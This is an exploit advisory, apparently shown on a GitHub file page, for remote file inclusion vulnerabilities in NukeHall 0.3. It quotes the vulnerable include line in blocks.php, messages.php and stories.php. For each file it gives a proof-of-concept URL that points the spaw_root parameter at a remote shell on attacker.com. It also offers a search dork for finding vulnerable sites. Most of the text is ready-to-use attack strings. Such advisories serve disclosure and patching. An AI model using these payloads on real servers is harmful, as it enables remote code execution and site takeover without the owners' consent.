-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy path10015.txt
37 lines (32 loc) · 1.28 KB
/
10015.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
NukeHall <= 0.3 Multiple Remote File Inclusion Vulnerabilities
==============================================================
########################################################################
#NukeHall <= 0.3 Multiple Remote File Include Vulnerability
#Download Script : http://sourceforge.net/project/NukeHall/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./nukehall_0.3/admin/modules/blocks.php (line 28)
# <?php
# include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/blocks.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/messages.php (line 28)
# <?php
# include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/messages.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/stories.php (line 28)
# <?php
# include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/stories.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#
#
########################################################################